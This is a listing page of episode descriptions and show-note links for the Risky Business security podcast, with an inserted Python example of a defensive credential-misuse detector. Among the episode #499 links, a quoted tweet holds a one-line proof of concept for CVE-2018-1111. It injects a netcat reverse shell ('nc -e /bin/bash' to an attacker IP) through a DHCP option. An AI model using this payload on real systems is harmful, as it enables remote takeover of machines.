Risky Business

By Patrick Gray


Description

Risky Business is a weekly information security podcast featuring news and in-depth interviews with industry luminaries. Launched in February 2007, Risky Business is a must-listen digest for information security pros. With a running time of approximately 50-60 minutes, Risky Business is pacy; a security podcast without the waffle.

Snake Oilers 6 part 1: InsightIDR from Rapid7, whitelisting with Airlock Digital and testing your SOC personnel with AttackIQ

First up in this edition of Snake Oilers we speak with Rapid7. Listeners of the regular show would have heard me talk about their UserInsight software for years. That’s because I knew people who used it and they swore by it. UserInsight was user and entity behaviour analytics (UEBA) software that was massively ahead of its time. It was very good at spotting weird things happening on your network when it comes to dumped or compromised creds popping up in weird places.

Well, InsightIDR is basically where UserInsight wound up, and yeah, it’s morphed into a product that’s half SIEM and half EDR.

Every Tom, Dick and Harriett seems to be offering EDR software these days, and every next-gen SIEM company is becoming more and more UEBA-centric, so what Rapid7 has created here is something in between. InsightIDR product manager Eric Sun will tell us all about it.
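The "compromised creds popping up in weird places" idea above is easy to sketch as code. What follows is an added example for this page, not Rapid7 or InsightIDR code: a toy UEBA-style check over constructed logon records (the `timestamp,user,host,src_ip` format and all hosts and accounts are made up for the example). It learns, per account, which hosts that account normally logs on to and which hosts have a single dominant user, then flags a credential landing on someone else's box, a first-ever logon to an unowned host, and a credential fanning out across several hosts inside a short window.

```python
"""UEBA-style credential misuse check.

Added example for this page, not Rapid7/InsightIDR code. All events below
are constructed; the CSV layout 'timestamp,user,host,src_ip' is assumed.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    user: str
    host: str     # host the logon landed on
    src_ip: str   # origin of the logon; kept for triage, unused by the rules


# Constructed "learning" period: who normally logs on where. Not real logs.
BASELINE = """\
2018-06-01T08:00:00,alice,ws-alice,10.0.1.10
2018-06-01T08:05:00,bob,ws-bob,10.0.1.11
2018-06-02T08:01:00,alice,ws-alice,10.0.1.10
2018-06-02T08:06:00,bob,ws-bob,10.0.1.11
2018-06-03T08:02:00,alice,ws-alice,10.0.1.10
2018-06-03T08:07:00,bob,ws-bob,10.0.1.11
2018-06-01T02:00:00,svc-backup,fs01,10.0.2.5
2018-06-02T02:00:00,svc-backup,fs02,10.0.2.5
2018-06-03T02:00:00,svc-backup,fs01,10.0.2.5
2018-06-01T09:00:00,alice,fs01,10.0.1.10
""".splitlines()

# Constructed "live" period: a service account suddenly touching workstations.
LIVE = """\
2018-06-04T03:10:00,svc-backup,fs01,10.0.2.5
2018-06-04T03:12:00,svc-backup,ws-bob,10.0.7.99
2018-06-04T03:14:00,svc-backup,ws-alice,10.0.7.99
2018-06-04T08:00:00,alice,ws-alice,10.0.1.10
2018-06-04T08:30:00,alice,print01,10.0.1.10
""".splitlines()


def parse_events(lines):
    """Parse 'ts,user,host,src_ip' lines into time-ordered AuthEvents."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, user, host, src = line.split(",")
        events.append(AuthEvent(datetime.fromisoformat(ts), user.lower(), host.lower(), src))
    return sorted(events, key=lambda e: e.ts)


def build_baseline(events, owner_share=0.8):
    """Return (hosts each user normally logs on to, dominant user per host).

    A host gets an 'owner' only when one account produced >= owner_share of
    its logons, so shared servers (fs01 below) have no owner.
    """
    user_hosts = defaultdict(set)
    host_users = defaultdict(Counter)
    for e in events:
        user_hosts[e.user].add(e.host)
        host_users[e.host][e.user] += 1
    owner = {}
    for host, counts in host_users.items():
        top, n = counts.most_common(1)[0]
        if n / sum(counts.values()) >= owner_share:
            owner[host] = top
    return user_hosts, owner


def detect(baseline, events, window=timedelta(minutes=10), spread=3):
    """Yield (severity, user, host, reason) tuples for suspicious logons."""
    user_hosts, owner = baseline
    recent = defaultdict(list)   # user -> [(ts, host)] seen inside `window`
    alerts = []
    for e in events:
        # Rule 1: this credential has never logged on to this host before.
        if e.host not in user_hosts.get(e.user, set()):
            who = owner.get(e.host)
            if who and who != e.user:
                alerts.append(("HIGH", e.user, e.host, f"host normally used only by {who}"))
            else:
                alerts.append(("MEDIUM", e.user, e.host, "first logon to this host"))
        # Rule 2: same credential on `spread` distinct hosts inside `window`,
        # the pattern a dumped credential replayed across a network produces.
        recent[e.user] = [(t, h) for t, h in recent[e.user] + [(e.ts, e.host)]
                          if e.ts - t <= window]
        hosts = {h for _, h in recent[e.user]}
        if len(hosts) >= spread:
            alerts.append(("HIGH", e.user, e.host, f"{len(hosts)} hosts in {window}"))
            recent[e.user] = []  # fire once per spree, not once per further host
    return alerts


def run_demo():
    """Learn from BASELINE, then score LIVE."""
    return detect(build_baseline(parse_events(BASELINE)), parse_events(LIVE))


if __name__ == "__main__":
    for alert in run_demo():
        print(*alert)
```

The 80% ownership threshold and the 10-minute / 3-host spread are arbitrary knobs chosen for the constructed data; on real telemetry both need tuning against a few weeks of normal activity, and the service account that legitimately touches every host (backup, vulnerability scanner) needs its own baseline or an exclusion, or Rule 2 will page you every night.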

Next up we’ll hear the simplest pitch in this podcast, from Airlock Digital. They’re an Australian company that makes whitelisting software that’s actually usable. If your organisation has tried implementing whitelisting through Microsoft’s AppLocker then you know how badly it sucks. These guys have created a simple but usable whitelisting solution.

I’ve been to the booth! I’ve seen the demo! Airlock Digital co-founder David Cottingham is our guest on their behalf. In addition to being a founder, David is also the author of the SANS course SEC480, which covers the ASD Top 4; number one on that list is whitelisting. He has experience in the federal government implementing whitelisting and, after seeing just how badly other products suck, he and his mates founded Airlock Digital. So yeah, if you’re whitelist-curious or if you’re sick of dealing with AppLocker, then you really, really should stick around for that one.

After that we’re checking in with Stephan Chenette of AttackIQ. They make attack simulation software, but in response to customer demand they’ve actually taken it to its logical extension - they’re now offering modules you can use to test your SOC staff, or, if you outsource, you can use these modules to test your MSSP. Throw some alerts at them and see what comes back – get scores for individual SOC operators. Hey, even if you ARE an MSSP you might want to use this software to see who to promote in your SOC. That’s interesting stuff.

Jun 21, 2018
Risky Business #504 -- Latest email frauds and changes to money muling

On this week’s show we’re chatting with Alex Tilley. He’s with Secureworks in Australia these days, but before that he spent a big chunk of his career with the Australian Federal Police.

He did a presentation a few weeks back at the AusCERT conference all about what fraud crews are up to these days. He’ll be joining us to walk through how much damage West African crime groups are doing with compromised Office 365 accounts. We also talk a bit about trends in money muling, because that game has really changed.

This week’s show is brought to you by Cylance, and in this week’s sponsor interview we’ll be chatting with Cylance’s very own Jim Walter about how ransomware hasn’t really gone anywhere, despite most of the tech press getting sick of writing about it.

Adam Boileau, as usual, joins us to talk about the week’s news, including:

  • The Vault7 guy is totally screwed
  • US Senate scuttles Trump’s plan to save ZTE
  • Chinese pwning satellite comms, telcos
  • Olympic Destroyer crew is back

Links to everything are below and you can follow Patrick and Adam on Twitter if that’s your thing.

Show notes

Ex-CIA employee charged in major leak of agency hacking tools - The Washington Post
Ryan Duff on Twitter: "The CIA leaker conducted a privilege escalation on the computer he used to access the data he stole, erased all the logs of his activity, and then locked other users out. A lot more tradecraft here than your average leaker… https://t.co/vIy0JL2f63"
WikiLeaks Shares Alleged Diaries of Accused CIA Leaker Joshua Schulte - Motherboard
Senate rejects Trump’s plan to lift ZTE export ban | Ars Technica
China-based campaign breached satellite, defense companies: Symantec | Reuters
Senate bill hopes to sort out supply-chain cybersecurity risks, prevent next Kaspersky drama
Kaspersky Halts Europol and NoMoreRansom Project Coop After EU Parliament Vote
North Korea to blame for string of Latin America bank hacks, insiders say
After Trump courts Kim, U.S. issues warning on North Korean malware
The Olympic Destroyer Hackers May Have Returned For More | WIRED
Patrick Gray on Twitter: "And there it is. The circle is complete. The whole point of Olympic Destroyer was to cast doubt on attribution generally, even though nobody who matters ever made attribution claims based on a few “vectors”.… https://t.co/RFXQYGr7sl"
Yubico snatched my login token vulnerability to claim a $5k Google bug bounty, says bloke • The Register
Iran’s Telegram Ban Has Impacted All Corners of the Country | WIRED
FBI recovers WhatsApp, Signal data stored on Michael Cohen’s BlackBerry | Ars Technica
Reminder: macOS still leaks secrets stored on encrypted drives | Ars Technica
Verizon and AT&T will stop selling your phone’s location to data brokers | Ars Technica
Google to Fix Location Data Leak in Google Home, Chromecast — Krebs on Security
17 Backdoored Docker Images Removed From Docker Hub
Cortana Hack Lets You Change Passwords on Locked PCs
ZeroFont Technique Lets Phishing Emails Bypass Office 365 Security Filters
Hacker Breaches Syscoin GitHub Account and Poisons Official Client
Clipboard Hijacker Targeting Bitcoin & Ethereum Users Infects Over 300,000 PCs
Chris Vickery on Twitter: "Holy shit. This guy, George Cottrell, was advertising money laundering services on the dark web. He was caught red-handed in a FBI sting. Guy is (was) top aide to the Brexit campaign leader, Nigel Farage. His super secret dark web username was "Banker". https://t.co/unEM4CnYVj"
InstaCyber on Twitter: "It begins. THANKS #GDPR https://t.co/JH9CyWGWcO"
Bitcoin’s Price Was Artificially Inflated, Fueling Skyrocketing Value, Researchers Say - The New York Times
Man Gets 20 Years In Jail For Trying To Steal A Domain Name At Gunpoint | Gizmodo Australia
Cops Are Confident iPhone Hackers Have Found a Workaround to Apple’s New Security Feature - Motherboard
https://dcso.de
cylance spear team - Google Search
Jun 20, 2018
Risky Business #503 -- North Korean tech in the global supply chain

You might have noticed North Korea’s been in the news over the last couple of days. Well, we’re sticking with the theme – we’ve got a great feature interview for you this week with Andrea Berger. She’s a senior research associate at the US-based James Martin Center for Nonproliferation Studies and the co-host of the Arms Control Wonk podcast. This week she speaks with Risky Business contributor Hilary Louise about a report the centre did into North Korea’s IT industry.

Yep, they have one, and you’ll be surprised by its scope and reach. That’s this week’s feature interview.

This week’s sponsor interview is with Signal Sciences co-founder and CEO Andrew Peterson. Andrew was at a Gartner event in DC last week, and I grabbed some time with him to talk about what’s new in DevSecOps, how people are applying various DevSecOps tools, and what the general awareness of good DevSecOps practices is out there. Andrew’s prior career was in development, not security. He and Zane Lackey worked together at Etsy and Signal Sciences was very much inspired by the work they both did there. Andrew says analysts are starting to understand that web application security isn’t something you drop on to a network in an appliance and things are actually changing.

Mark “Pipes” Piper is this week’s news guest. All the show links are below and you can follow Patrick, Pipes or Hilary, if that floats your boat.

Show notes

Founder of Cybersecurity Company Says His Firm Was Sanctioned Because He was Born in Russia - Motherboard
Treasury Sanctions Russian Federal Security Service Enablers | U.S. Department of the Treasury
Republican senators move to block Trump’s deal to revive ZTE | Ars Technica
WannaCry Hero Marcus Hutchins' New Legal Woes Spell Trouble for White Hat Hackers | WIRED
Cisco's Talos Intelligence Group Blog: VPNFilter Update - VPNFilter exploits endpoints, targets new devices
Top U.S. counterintelligence official: Kaspersky's move to Switzerland doesn't matter
Chinese hackers stole sensitive U.S. Navy submarine plans from contractor
China ramps up hacking of U.S. high-tech companies | McClatchy Washington Bureau
Flash zero-day shows up in Qatar amid geopolitical struggles
NDAA pushes U.S. Cyber Command to be more aggressive
Senator hopes to draw red line discouraging election cyberattacks
Congress wants to prevent states from weakening encryption
FBI announces arrest of 74 email fraudsters on three continents
For almost 11 years, hackers could easily bypass 3rd-party macOS signature checks | Ars Technica
I can be Apple, and so can you | Okta
This app in Google Play wants to use phone mics to enforce copyrights | Ars Technica
In a blow to e-voting critics, Brazil suspends use of all paper ballots | Ars Technica
Some Signal Disappearing Messages Are Not Disappearing - Motherboard
US Government Probes Airplane Vulnerabilities, Says Airline Hack Is ‘Only a Matter of Time’ - Motherboard
Hackers Crashed a Bank’s Computers While Attempting a SWIFT Hack
Apple just banned cryptocurrency mining on iOS devices | Ars Technica
Ethereum "Giveaway" Scammers Have Tricked People Out of $4.3 Million
Around 5% of All Monero Currently in Circulation Has Been Mined Using Malware
Trik Spam Botnet Leaks 43 Million Email Addresses
DPRK's Shadow Sector report
Jun 13, 2018
Risky Business #502 -- Inside China's hacker scene

On this week’s show we chat with Peter Wesley. Peter’s well known around the Australian security scene, but a few years back he relocated to China, where security is booming. He did a presentation at the AusCERT conference on the Gold Coast last week all about the Chinese hacker scene and security industry. He joins us in this week’s feature interview to tell us about how the Chinese scene evolved and what its current relationship with the Chinese government looks like.

This week’s sponsor interview is a cracker. We’ll be joined by Ryan Kalember, Senior Vice President of Strategy with Proofpoint, the email filtering company. Ryan is along to talk about a phenomenon the Proofpointers are very interested in – we’ve all heard of VIPs, but he’s here to talk about VAPs – Very Attacked People.

So much attacker behaviour these days is driven by email-based attacks, and the people getting hit the most with this sort of stuff might not be the ones you expect. Ryan joins us later on for that conversation in this week’s sponsor interview, with thanks to Proofpoint.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

What Will Microsoft's GitHub Buy Mean For Controversial Code? | WIRED
A host of new security enhancements is coming to iOS and macOS | Ars Technica
Apple Is Testing a Feature That Could Kill Police iPhone Unlockers - Motherboard
Microsoft Adds Post-Quantum Cryptography to an OpenVPN Fork
Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628) - DZone Security
Data from 92 million accounts stolen from DNA testing site MyHeritage
Hacker Defaces Ticketfly’s Website, Steals Customer Database - Motherboard
SS7 routing-protocol breach of US cellular carrier exposed customer data | Ars Technica
Judge dismisses Kaspersky lawsuits, U.S. government ban will stand
Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'
Former DIA official allegedly sold secrets to China, including possible Cyber Command information
ICANN Launches GDPR Lawsuit to Clarify the Future of WHOIS | Threatpost | The first stop for security news
With possible summit approaching, North Korean espionage hacks continue | Ars Technica
Synack offers free penetration testing for election systems ahead of 2018 midterms
CrowdStrike announces $1 million warranty for breaches that happen under its watch
IE Zero-Day Adopted by RIG Exploit Kit After Publication of PoC Code
CVE-2018-8174 | Windows VBScript Engine Remote Code Execution Vulnerability
Chrome and Firefox leaks let sites steal visitors’ Facebook names, profile pics | Ars Technica
Zip Slip Vulnerability Affects Thousands of Projects Across Multiple Ecosystems
Malicious Git Repository Can Lead to Code Execution on Remote Systems
The NSA Just Released 136 Historical Propaganda Posters - Motherboard
NSA Security Posters 1950s-1970s - Album on Imgur
Jun 06, 2018
Risky Business #501 -- Trisis: signalling, deterrence or escalation?

On this week’s show we’ll be talking about a whole bunch of stuff – the FBI taking down a botnet in a very FBI way, we go deep on the Trisis malware popping up in the US following America’s withdrawal from the so-called Iran agreement. We look at the latest in the crypto debate, breaches, bugs and more!

We’ll hear from Tom Uren of the Australian Strategic Policy Institute (ASPI) on the Trisis side of things. Tom worked in an interesting place in Australia’s defence department but these days spends his time think-tanking at ASPI. He shares his thoughts on what it is Iran could be up to with Trisis.

This week’s show is brought to you by: Australia!

AustCYBER is a government-supported industry group here that is trying to get the Australian cybersecurity industry organised. There’s the VC-backed US model, the Israeli build-a-“cyber city”-in-the-desert model, and then there’s the Australian model, which is actually quite different. It’s much more about helping local startups win deals locally, then internationally, to get them on a path to profitability so they don’t have to sign the awful term sheets Australian VCs put in front of them.

Well, there’s more to it than that, but AustCYBER head honcho Michelle Price will be along in this week’s sponsor interview to walk us through what she’s trying to do for the Australian security industry and how foreign multinational companies can also benefit from that.

Show notes

Exclusive: FBI Seizes Control of Russian Botnet
Cisco's Talos Intelligence Group Blog: New VPNFilter malware targets at least 500K networking devices worldwide
Robᵉʳᵗ Graham 🤔 on Twitter: "This advice from the FBI is best described as "moronic". It advised 126 million households in the U.S. to reboot their routers in order to address a botnet of 500,000 devices located mostly outside the U.S. https://t.co/qhm96HmLVZ"
FBI: Kindly Reboot Your Router Now, Please — Krebs on Security
FBI shuts down domain behind Russian 'VPNFilter' botnet
Researchers uncover sophisticated botnet aimed at possible attack inside Ukraine
Trisis masterminds have expanded operations to target U.S. industrial firms
U.S. industry experts call for vigilance after Trisis group goes global
In the dark about 'going dark'
Encryption advocates rip FBI over inflated encrypted device statistics
Apple reports spike in national security requests amid promises of more transparency
Why Is Your Location Data No Longer Private? — Krebs on Security
The U.S. military combined cyber and kinetic operations to hunt down ISIS, general says
Hacker linked to Russian intelligence sentenced to five years in prison
Cyber crooks claim to hit two big Canadian banks | Reuters
Chinese researchers warn blockchain company EOS about 'epic' vulnerability in soon-to-launch platform
No one is updating their Android devices, new data shows
Oracle Plans to Drop Java Serialization Support, the Source of Most Security Bugs
3 Charged In Fatal Kansas ‘Swatting’ Attack — Krebs on Security
Russian unit, GRU officer linked to 2014 shoot-down of airliner over Ukraine | Ars Technica
Cyber Security Growth Network - Australian Cyber Security Growth Network
May 30, 2018
Risky Biz Soap Box: Kill your own meat with EclecticIQ

Soap Box is not our regular weekly show, it’s the monthly podcast here at Risky Biz HQ where vendors pay to come on to the show to talk about what it is they actually do.

Before EclecticIQ sponsored this edition, to be honest, I didn’t really know much about them. All I knew is that their positioning was very much around “threat intelligence,” which, as regular listeners would know, are two words that are usually followed by “derpa derpa” on the regular Risky Business podcast.

BUT! Here’s the thing. EclecticIQ don’t sell a “blinky light” box that receives a creaky feed of 12-month-old IOCs. They sell their solution to either massive organisations or very high risk organisations. They could be national cyber security centres, entire defence departments, very, very big enterprises; basically anyone that has an intelligence team and multiple constituent departments or agencies. They also play in ultra high risk sectors like defence contracting.

The EclecticIQ platform isn’t for small organisations. It really is for orgs that have dedicated, externally-focussed intelligence teams. Their play isn’t “we feed you threat intelligence,” it’s “use our tooling to go and get your own threat intelligence, develop a strategy for dealing with the resulting product, then distribute the strategy that flows from that process to the relevant people in your organisation.” I like to think of this approach as “killing your own meat”. That’s what EclecticIQ is all about. They give you the shotgun and a map, the last known locations of the deer, a cool room and a bunch of cleavers. Delicious. Apologies to any vegetarians listening for that metaphor.

Joep Gommers is our guest. He is the founder and CEO of EclecticIQ. Prior to founding EclecticIQ, Joep served as Head of Global Collection and Global Intelligence Operations at iSIGHT Partners, which was, of course, acquired by FireEye. Joep joined me to talk about what it is that EclecticIQ actually does and the resulting conversation, I hope, will be interesting to anyone who wants to understand how threat intelligence is developed and disseminated at scale.

There’s a link to EclecticIQ’s website below, and you can follow Joep Gommers on Twitter here.

May 28, 2018
Risky Business #500 -- Web asset discovery is getting useful

In this week’s feature interview we’ll be chatting with Shubham Shah and his friend Lord Tuskington about continuous asset discovery’s impact on testing methodologies. Shubs has worked as both a pentester and as a very successful bug bounty hunter. In fact he’s built an entire asset discovery platform that he and his buddies have been using to rip crazy amounts of cash out of bounty programs over the last few years and he’s turning that platform into a product. So I wanted to talk to him about that, but I also wanted to get a pentester’s perspective on how this type of continuous asset discovery tech could change the testing industry.

This week’s show is brought to you by Exabeam, a next generation SIEM company! And it’s amazing how nicely this week’s feature and sponsor interviews dovetail actually, because Exabeam’s Steve Gailey will be along in this week’s sponsor interview to have a chat about how SIEM technology has changed much faster than SOC operations methodologies. Because basically everyone has structured their operations around three levels of response and the workflows are so ingrained, nobody seems to know what to do with a next generation SIEM.

Adam Boileau is also along, like always, to talk about the week’s security news.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

Alleged CIA Leaker Joshua Schulte Has Some of the Worst Opsec I’ve Ever Seen - Motherboard
Accused CIA leaker Joshua Schulte accused of more leaks
Alleged CIA Leaker Tweeted That Chelsea Manning ‘Should Be Executed’ - Motherboard
Trump feels presidential smartphone security is “too inconvenient” | Ars Technica
Trump, Chinese leaders moving forward on deal to save ZTE - The Washington Post
House measure asks DHS to share info on potential ZTE cyberthreat
Potential Trump deal to ease sanctions on China's ZTE riles Congress
Revealed: Pentagon Push to Hack Nuke Missiles Before They Launch
Banks Adopt Military-Style Tactics to Fight Cybercrime - The New York Times
Inside 'Project Indigo,' the quiet info-sharing program between banks and U.S. Cyber Command
Hacker Breaches Securus, the Company That Helps Cops Track Phones Across the US - Motherboard
LocationSmart bug allowed for leak of location data for nearly any U.S. phone - CyberScoop
Who's Afraid of Kaspersky? - Motherboard
New speculative-execution vulnerability strikes AMD, ARM, and Intel | Ars Technica
After Arrest in Serbia, Netflix Hackers ‘The Dark Overlord’ Say They’re Still Going - Motherboard
Cisco's Talos Intelligence Group Blog: TeleGrab - Grizzly Attacks on Secure Messaging
North Korea-tied hackers used Google Play and Facebook to infect defectors | Ars Technica
The Wayback Machine is Deleting Evidence of Malware Sold to Stalkers - Motherboard
Latvian national convicted of running 'VirusTotal-for-criminals' malware scanner
Alphabet's Jigsaw offers political campaigns free DDoS protection
T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account — Krebs on Security
Karin Kosina on Twitter: "So the guy behind the Carbanak malware that stole hundreds of millions of dollars? He was caught because he bought a car for 70k and didn't pay the bill. Can't make this sh** up :) #opsec #fail https://t.co/rRmFzywmVI"
GPON Routers Attacked With New Zero-Day
Cisco fixes critical ‘DNA’ software flaws
Pakistan: Campaign of hacking, spyware and surveillance targets human rights defenders | Amnesty International
AUSTRALIA'S DEADLIEST ANIMALS - SONG - YouTube
May 23, 2018
Risky Business feature interview: Hacking PUBG

Here it is – this week’s feature interview with Marisa Emerson! Marisa is a security researcher who did a great talk at BSides Canberra in March all about game cheating.

She was specifically talking about the cheating techniques PUBG gamers are using and just how advanced they are. The crazy thing is the cheaters here are rolling some pretty decent techniques. It’s reminiscent of the iPhone jailbreaking scene – a lot of good hackers who don’t know they’re good hackers.

Marisa is running a binary exploitation bootcamp in Brisbane that will have another session next semester. Details are here.

May 18, 2018
Risky Business #499 -- Is PGP actually busted and Signal pwnt? Noooope

In this week’s show we’re just going to drill into the week’s extra-long security news section with Adam Boileau, then go straight to the sponsor interview. I’ve got a fantastic feature interview for you this week, but I’m going to publish it outside of the news show. It was either that or run stupidly long or cut too much from everything to make it all fit.

This week’s sponsor interview is a good one though. We’re chatting with the team behind Darktrace. They make a machine learning-backed network monitor. A key difference with this kit is that it actually gets involved on the network: if it sees something it’s confident is attacker behaviour, it will start spraying TCP resets to boot them off the network.

This is something the IPS systems of old used to do but it’s an approach that fell out of favour. We’ll find out why that approach was discarded and why it’s coming back, as well as generally discuss the role of machine learning in security with a company that has invested in it heavily. This isn’t a “for or against” interview segment. This is a discussion with one company that is getting value out of the approach, so stick around for that.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

Without Nuclear Deal, U.S. Expects Resurgence in Iranian Cyberattacks - The New York Times
How Two Persian Gulf Nations Turned The US Media Into Their Battleground
National Security Council delays publication of cyber strategy over inclusion of 'offensive' measures
Bolton eliminates White House Cybersecurity Coordinator position
Lawmakers introduce bill to save top White House cyber job after Bolton eliminated it
Ex-CIA employee identified as suspect in 'Vault 7' leaks
Sebastian Schinzel on Twitter: "We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4"
'Efail' exploit can decrypt old emails that were previously encrypted - CyberScoop
Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated] | Ars Technica
CVE-2018-1000136 - Electron nodeIntegration Bypass
Security flaw in Electron impacts hundreds of desktop apps
Michael Gianarakis on Twitter: "I don’t know man - as I said I wasn’t involved so I don’t know what was tested and when, what was covered during disclosure etc. All I was saying in my original tweet was that I didn’t read the post to say any specific app was vulnerable or not.… https://t.co/wVmG4FE0yI"
Alfredo Ortega on Twitter: "Remote zero-click JavaScript code execution on signal desktop message app. Thanks @HacKanCuBa and @julianor https://t.co/YgT8akGfBI"
Alfredo Ortega on Twitter: "And we'll release the Signal-Desktop Remote code exec advisory (CVE-2018-10994) in some hours. Not a good week for privacy software. https://t.co/ElysIPAlvo"
It only took five hours to close a critical vulnerability in Signal's desktop client
'Disappearing' Signal Messages Are Stored Indefinitely on Mac Hard Drives - Motherboard
China's ZTE says main operations have ceased after US ban
Lucas Tomlinson on Twitter: "JUST IN: Pentagon orders all stores on U.S. military bases worldwide to ban phones and telecom equipment from Chinese companies Huawei and ZTE, following warnings from top U.S. intelligence officials the Chinese companies could be spying on Americans"
Donald J. Trump on Twitter: "President Xi of China, and I, are working together to give massive Chinese phone company, ZTE, a way to get back into business, fast. Too many jobs in China lost. Commerce Department has been instructed to get it done!"
Microsoft Enabling Javascript in Excel Has Security Pros Anxious | WIRED
Researcher Runs Coinhive Cryptominer in Excel Just Days After Microsoft Announces JavaScript Custom Functions
Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets
Georgia governor vetoes cyber bill that would criminalize “unauthorized access” | Ars Technica
Russian Troll Farm Hijacked American Teen Girls’ Computers for Likes
Dutch ditch Kaspersky on fears of Russian government influence
Possible Kaspersky sanctions meet resistance inside U.S. government
Wyden calls for FCC investigation into cell-phone tracking used by law enforcement
Kia‏☆ on Twitter: "this isnt a joke, try out https://t.co/QKa5nNOKjN, you can find the current location of a phone (not just with cell tower info, it can force AGPS) with just *its phone number*; the demo site requires you reply to an SMS but there's no technical requirement against that! https://t.co/kfMDU2qxjZ"
Government would be barred from mandating crypto backdoors under House bill
Symantec's stock plummets after announcement of internal audit
Lawmakers call for action following revelations that APT28 posed as ISIS online
Counterterrorism Officials Concerned About Technological Advances of Jihadists in the US
Vigilante Hacks Government-Linked Cyberespionage Group - Motherboard
Pakistani military leverages Facebook Messenger for wide-ranging spyware campaign
DDoS Attacks Leverage UPnP Protocol to Avoid Mitigation
Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers
Windows 10 OpenSSH Client Installed by Default in April 2018 Update
Malicious Apps Get Back on the Play Store Just by Changing Their Name
Multiple OS Vendors Release Security Patches After Misinterpreting Intel Docs
Barkın Kılıç on Twitter: "#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat… https://t.co/NMthW41Xql"
Morning mail: Ecuador's costly Assange spy operation | Australia news | The Guardian
Evil Mainframe Penetration Testing Classes
Evil Mainframe: Mainframe Penetration Testing Registration, Tue, Jun 12, 2018 at 9:00 AM | Eventbrite
Darktrace
May 16, 2018
Risky Business #498 -- There sure is a lot of Microsoft Defender out there these days

On this week’s show we’re taking a look at some recent data out of Microsoft trumpeting its Defender antivirus install figures on Windows. They’ve got 18% market share on Windows 7/8 and 50% on Windows 10.

For the AV and endpoint security industry Microsoft has always been the existential threat, but has the plane flown into the mountain already? We’ll speak with Securosis analyst and DisruptOps founder Rich Mogull about that in this week’s feature interview.

In this week’s sponsor interview we’re joined by the always entertaining Haroon Meer of Thinkst Canary. When we spoke Haroon had just wrapped up his first ever booth at the RSA conference. He’ll join us this week to tell us, surprisingly, that it was a really worthwhile exercise for Thinkst, but as you’ll hear he also thinks the broader industry can be a pack of dumbasses when it comes to actually marketing tech at events like RSA. If he becomes global ruler, RSA booths will be gimmick-free and just show people product demos.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

BREAKING: Documents show how provincial employees misled Halifax police in the FOIPOP security failure
FTC urges Twitter users to change passwords | TheHill
Iran nuclear deal: Trump pulls US out in break with Europe allies - BBC News
Patrick Gray on Twitter: "There are teams workshopping ideas like this in Tehran right now, guaranteed. Personally I'm more worried about Iranian ICS hax. They've gotten good at that stuff.… https://t.co/XQBvRcUKw9"
Caroline O. on Twitter: "NEW: The Senate Intelligence Committee released its prelim findings into Russian targeting of election infrastructure during the 2016 election. "In a small # of states, Russian-affiliated cyber actors were in a position to, at a minimum, alter or delete voter registration data."… https://t.co/Y0GMwUZEFU"
Facebook security analyst is fired for using private data to stalk women | Ars Technica
Sources: Facebook Has Fired Multiple Employees for Snooping on Users - Motherboard
Drive-by Rowhammer attack uses GPU to compromise an Android phone | Ars Technica
Android App With 10 Million Downloads Left Users’ Photos and Audio Messages Exposed to Public - Motherboard
Hundreds of big-name sites hacked, converted into drive-by currency miners | Ars Technica
Report: Chinese government is behind a decade of hacks on software companies | Ars Technica
Over 10,000 companies downloading software vulnerable to Equifax hack
European Central Bank proposes framework to strengthen financial system’s defenses
Hysteria over Jade Helm exercise in Texas was fueled by Russians, former CIA director says | The Texas Tribune
Defector: WikiLeaks ‘Will Lie to Your Face’
SiliVaccine: Inside North Korea’s Anti-Virus - Check Point Research
You Can Finally Encrypt Slack Messages So Your Boss Can't Read Them - Motherboard
Microsoft May 2018 Patch Tuesday Fixes 67 Security Issues, Including IE Zero-Day
Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack
He Fled a Prison in Iceland. Now It’s Good to Be Back. - The New York Times
Report: Software bug led to death in Uber’s self-driving crash | Ars Technica
Carbon Black stocks close 26 percent up on first day of public trading
Why Windows Defender Antivirus is the most deployed in the enterprise – Microsoft Secure
thinkst Thoughts...: Considering an RSAC Expo booth? Our Experience, in 5,000 words or less
May 09, 2018
Risky Biz Soap Box: Root9b on agentless threat hunting

In this edition of Soap Box we’re chatting with Root9b. They’ve just launched an updated version of their ORION platform. And I guess the way you’d describe Root9b is as a threat hunt product maker and managed threat hunt provider. And their approach is a bit different – their software is agentless. They basically authenticate to a machine, inject various payloads into memory, and use that to pull back all sorts of telemetry from machines.

They say this means it’s much less likely that attackers will see them, and they offer this as a product, ORION, or as a service. They say their managed services customers come to them because they’re pretty unhappy with their MDR and MSSP providers and want better signalling.

So I was joined by John Harbaugh, COO of Root9b, and Mike Morris, CTO. Both of these guys were US Air Force cyberdudes before jumping out to the private sector. The company actually started off doing training before developing their platform ORION.

John and Mike joined me by Skype for this podcast. Enjoy!

May 04, 2018
Risky Business #497 -- Silvio's greatest hits

This week’s Risky Business is kind of going back to its roots a bit. As much as we love talking about policy and the intersection of cyber security with global affairs, sometimes it pays to remember that computer security is actually about computers.

